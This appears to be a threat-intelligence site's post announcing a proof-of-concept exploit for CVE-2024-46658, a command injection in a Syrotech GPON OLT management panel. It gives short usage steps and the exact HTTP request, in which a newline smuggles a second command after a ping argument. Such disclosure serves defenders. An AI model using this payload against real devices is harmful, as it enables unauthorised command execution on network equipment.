Vulnerabilities — Tools

PoC CVE-2024-46658 - Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629

, and Dark Web Informer

3 October 2024 . 7:25 PM

1 min read

GitHub:https://github.com/jackalkarlos/CVE-2024-46658
Last Commit: October 3rd, 2024

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Command Injection Vulnerability

Usage

1- Edit the URL in the script.

2- Edit the Cookie_Login value in the script.

3- Run the script, it will allow you to executing commands.

Vulnerability Details

GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1

Normally, only the ping command is allowed to be executed in the administration panel.

If you intercept the request with a proxy, add a new line byte to the end of the command parameter and type the command you want to run, it will allow you to run another command.

Authors

Mehmet Demir

Comments

Latest

DDoS Attacks

Anonymous KSA Targeted the Website of ADAMA

, and Dark Web Informer

8 October 2024

Paid Members Public

Leaks

A Threat Actor Allegedly Leaked the Betha Systems Database

, and Dark Web Informer

8 October 2024

Paid Members Public

Data Breaches

A Threat Actor Allegedly Leaked IMAP Access to Excellence in Customs Logistics

, and Dark Web Informer

8 October 2024

Paid Members Public

Data Breaches

A Threat Actor is Allegedly Selling Customer Data of Cosmenet

, and Dark Web Informer

8 October 2024

Paid Members Public

PoC CVE-2024-46658 - Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629

Usage

Vulnerability Details

Authors

Comments

Related

Latest